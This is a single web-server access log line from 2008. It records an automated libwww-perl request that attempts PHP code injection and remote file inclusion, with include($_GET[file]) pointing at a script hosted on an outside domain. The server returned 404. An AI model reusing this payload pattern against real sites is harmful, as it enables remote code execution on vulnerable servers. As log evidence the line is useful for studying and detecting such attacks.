70.86.229.242 - - [19/Aug/2008:11:43:08 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
